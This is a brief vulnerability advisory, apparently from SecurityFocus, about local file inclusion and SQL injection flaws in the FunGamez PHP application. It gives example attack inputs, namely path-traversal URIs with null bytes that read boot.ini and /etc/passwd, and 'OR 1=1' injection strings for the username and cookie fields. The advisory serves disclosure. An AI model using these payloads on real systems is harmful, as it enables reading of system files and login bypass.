FunGamez Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs and data are available:

http://www.example.com/FunGamez/index.php?admin&module=../../../../../../boot.ini%00
http://www.example.com/FunGamez/index.php?admin&module=../../../../../etc/passwd%00

username: PEPE' OR 1=1 /*
user=1 path=/
user=pepe' or 1=1 /* path=/


 

Privacy Statement
Copyright 2010, SecurityFocus